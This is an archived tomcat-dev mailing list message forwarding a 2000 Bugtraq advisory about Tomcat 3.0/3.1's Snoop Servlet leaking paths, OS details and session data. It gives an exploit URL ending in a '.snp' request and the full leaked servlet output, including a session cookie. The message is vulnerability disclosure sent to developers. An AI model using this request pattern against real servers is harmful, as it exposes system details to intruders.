tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Christopher Elkins" <celk...@scardini.com>
Subject Fw: [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)
Date Thu, 20 Jul 2000 21:19:47 GMT
Hi, all.

This message was recently posted to the Bugtraq mailing list. I am forwarding it
here for those who don't monitor said list. If this problem is no longer
relevant, please disregard.

--
Christopher Elkins


----- Original Message -----
From: "ET LoWNOISE" <et@CYBERSPACE.ORG>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Wednesday, July 19, 2000 8:56 PM
Subject: [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)


> [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)
>
>
> ====PRODUCT:
> Snoop Servlet on Release Build 3.1 and 3.0 of Tomcat from
> Apache Software Foundation.
>
> http://jakarta.apache.org
>
>
>
> ====PROBLEM:
> The Snoop Servlet will give you too much info (PATHs, OS, etc.)
>
> ====EXPLOIT:
> http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp
>
>
> ====
> Snoop Servlet
>
> Servlet init parameters:
>
> Context init parameters:
>
> Context attributes:
>    javax.servlet.context.tempdir =
> /appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
>    sun.servlet.workdir =
> /appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
>
> Request attributes:
>
> Servlet Name: snoop
> Protocol: HTTP/1.0
> Scheme: http
> Server Name: narco.goverment.sucks.co
> Server Port: 8080
> Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX
> 4.2 POWER_RS; java.vendor=IBM Corporation)
> Remote Addr: xxx.xxx.xxx.xxx
> Remote Host: xxx.xxx.xxx.xxx
> Character Encoding: null
> Content Length: -1
> Content Type: null
> Locale: en
> Default Response Buffer: 8192
>
> Parameter names in this request:
>
> Headers in this request:
>    Host: narco.goverment.sucks.co:8080
>    Accept-Encoding: gzip
>    Cookie: JSESSIONID=To1212mC7833304641226407At
>    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,
> */*
>    Connection: Keep-Alive
>    Accept-Charset: iso-8859-1,*,utf-8
>    User-Agent: Mozilla/4.51 [en] (Winsucks; I)
>    Accept-Language: en
>
> Cookies in this request:
>    JSESSIONID = To1212mC7833304641226407At
>
> Request Is Secure: false
> Auth Type: null
> HTTP Method: GET
> Remote User: null
> Request URI: /examples/jsp/snp/anything.snp
> Context Path: /examples
> Servlet Path: /jsp/snp/anything.snp
> Path Info: null
> Path Trans: null
> Query String: null
>
> Requested Session Id: To1212mC7833304641226407At
> Current Session Id: To1212mC7833304641226407At
> Session Created Time: 964047263477
> Session Last Accessed Time: 964047528749
> Session Max Inactive Interval Seconds: 1800
>
> Session values:
>    numguess = num.NumberGuessBean@6bfa9a1
> ====
> Efrain 'ET' Torres
> et@cyberspace.org
>
> [LoWNOISE] Colombia 2000
>
>


Mime
View raw message